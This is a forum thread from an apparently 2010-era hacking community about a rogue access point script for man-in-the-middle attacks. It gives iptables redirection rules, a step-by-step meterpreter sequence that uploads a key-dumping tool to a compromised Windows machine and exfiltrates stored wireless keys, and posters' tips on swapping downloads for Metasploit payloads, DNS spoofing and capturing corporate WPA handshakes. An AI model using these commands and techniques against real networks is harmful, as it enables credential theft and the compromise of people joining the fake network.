Fix:
iptables -P INPUT ACCEPT
iptables -P FORWARD ACCEPT
iptables -P OUTPUT ACCEPT
iptables -t nat -A PREROUTING -i at0 -p tcp --dport 80 -j DNAT --to-destination 10.0.0.1
Great script works well
Runs meterpreter scripts just great
How I downloaded the wireless keys from the client
meterpreter> upload /xxxx/xxx/wkv.exe wkv.exe
(this uploads to c:/WINDOWS/system32 )
meterpreter> run multicommand -c "c:\\WINDOWS\\system32\\wkv /stext wirecodes.txt"
(this saves wirecodes.txt to c:\\WINDOWS\\system32)
meterpreter> download c:\\WINDOWS\\system32\\wirecodes.txt /tmp
now view the downloaded file
Someone else did another script for this:
Wireless Key Harvester --- including video - Remote Exploit Forums
This script doesn't automate it, so you have to do it all yourself
Anyway, it looks like you can upload, create and download the keys.
So you're wanting help with viewing it?! :S
Look in /tmp/! Use nano, vi, cat or kate to view the file!
Have you...g0tmi1k?
Sorry, I didn't make myself clear.
I can view it NO problem using kwrite or less.
Thanks for the reply, just trying to show others how I did it after months of trying.
I have tried the script you suggest but I failed.
thanks again
add this to the top, to stop any current process
killall -9 airbase-ng dhcpd3 apache2 wicd-client
/etc/init.d/dhcp3-server stop
/etc/init.d/apache2 stop
/etc/init.d/wicd stop
this way we can easily re-run the script multiple times
wicd is killed to prevent channel hopping.
All that just to do MITM attack on open wifi !?
my short ugly hack : Replace *.EXE with MSF payload .. - Remote Exploit Forums
You can also look at 'mass client side attack' or file pwn or wifizoo, karmetasploit. You could also DNS spoof to at least have it look like MSN etc. when downloading the update... the list goes on and on.
MSF meterpreter cheat sheet
http://www.rmccurdy.com/scripts/Meta...reference.html
O. Thanks (=
Glad that it works for you!
Thanks for the heads up, I'll try and get it in the next version.
opreat0r, as you're using ettercap (which I don't like for the record), I’m guessing you're poisoning the ARP. What if the target has ARP protection? Can’t poison due to the router/target ARP tables being protected/static/monitored? This is where this style of attack has its advantages, hence why I did “All that just to do MITM attack on open wifi”. Ettercap also doesn't create a network, it relies on an existing network, whereas this creates a new network, and we have full control over it.
I've seen and used FastTrack’s "mass client side attack". But I haven’t heard of "file pwn" (unless you mean replacing the exes with "our" exes). I've currently recorded videos for "WiFiZoo" & "karmetasploit" but haven't had the time to edit.
I know the list goes on! I just couldn’t be bothered to add it all in! Plus it’s harder to automate some of those programs, which was the idea of this script. And for the record, you could use Wireshark, and view all the data; I just chose those programs because of ease and automation/scripting.
I do like the idea of monitoring other traffic that isn’t on port 80, before they download the payload, and I'll see what I can do (if you have any other hints like this, please say!)
and thanks for the cheat sheet, but isn't scripting a little bit different?
Last edited by g0tmi1k; 06-01-2010 at 11:16 PM.
Have you...g0tmi1k?
And to add to g0tmi1k's statement there, a fake AP lets you put out a "linksys" ssid and get everyone automatically connecting to it, connecting to someone else's AP doesn't help you much. You can also use this to intercept and half-crack WPA points from companies using WPA-PSK.
Or, if you're in my city, you can put out the bus AP SSID and watch them all dump onboard video data to you (no longer a possibility thankfully, but it illustrates my point nicely).
Last edited by Gitsnik; 06-02-2010 at 01:13 AM. Reason: "a fake AP" not "fake AP"
Still not underestimating the power...
There is no such thing as bad information - There is truth in the data, so you sift it all, even the crap stuff.